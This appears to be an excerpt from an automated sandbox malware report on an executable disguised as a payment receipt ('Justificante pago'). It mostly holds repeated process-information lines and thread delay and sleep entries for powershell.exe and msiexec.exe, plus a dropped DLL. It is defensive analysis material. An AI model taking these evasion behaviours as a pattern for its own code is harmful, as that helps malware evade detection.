            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596603Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595621Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6288Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3475Jump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8144Thread sleep count: 1172 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8144Thread sleep count: 8681 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598797s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597922s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597375s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -597047s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596828s >= -30000sJump to behavior
